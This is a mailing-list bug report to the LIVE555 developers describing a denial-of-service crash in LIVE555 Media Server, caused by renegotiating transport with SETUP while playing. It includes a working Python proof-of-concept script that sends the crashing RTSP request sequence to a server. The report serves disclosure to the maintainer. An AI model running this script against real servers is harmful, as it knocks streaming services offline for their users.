Ok, here are the details: DESCRIPTION
An RTSP client can make the LIVE555 Media Server crash by renegociating transport parameters. PRODUCTS IMPACTED LIVE555 Media Server ( http://www.live555.com/mediaServer/ ). At minimum v0.74 (2011.12.23) to the most recent version to date v0.82 (2014.03.16). TECHNICAL DETAILS The following sequence of requests causes the DoS: 1. DESCRIBE (optionally) 2. SETUP (e.g. audio track) 3. SETUP (e.g. video track) 4. PLAY 5. SETUP (any of the previously opened tracks) 6. PLAY Adding a PAUSE request between steps 4 and 5 works around the problem. However, RFC 2326 (RTSP) specifies in chapter “A.2 Server State Machine” that a SETUP request can actually be issued in the “Playing” state. The following Python script reproduces the vulnerability. import socket import re host = ("172.17.44.20", 554) url = "rtsp://172.17.44.20/brasilccmovie.mpg" def send(msg): if (send.session != ''): msg += "Session: " + send.session + "\r\n" msg += "CSeq: " + str(send.cseq) + "\r\n" msg += "\r\n" s.send(msg) send.cseq += 1 reply = s.recv(1000) match = re.search('Session: ([^\r;]*)', reply, re.DOTALL) if (match): send.session = match.group(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(0.5) s.connect(host) send.session = '' send.cseq = 1 #send("DESCRIBE " + url + " RTSP/1.0\r\nAccept: application/sdp\r\n") send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34000-34001\r\n") send("SETUP " + url + "/track2 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34002-34003\r\n") send("PLAY " + url + " RTSP/1.0\r\n") #send("PAUSE " + url + " RTSP/1.0\r\n") send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=35000-35001\r\n") send("PLAY " + url + " RTSP/1.0\r\n") s.close() De: “Ross Finlayson” [email protected] À: “LIVE555 Streaming Media - development & use” [email protected] Envoyé: Mardi 15 Juillet 2014 19:58:34 Objet: Re: [Live-devel] DoS in Media Server Please post the details here. If the issue is significant, then we’ll update the code, and people will be encouraged to upgrade. Ross Finlayson Live Networks, Inc. http://www.live555.com/ live-devel mailing list [email protected] http://lists.live555.com/mailman/listinfo/live-devel -- Yann Fleutot Stormshield Network Security developer Arkoon Netasq 49 rue Billancourt - FR 92100 Boulogne-Billancourt Twitter - LinkedIn - www.stormshield.eu
_______________________________________________ live-devel mailing list [email protected] http://lists.live555.com/mailman/listinfo/live-devel
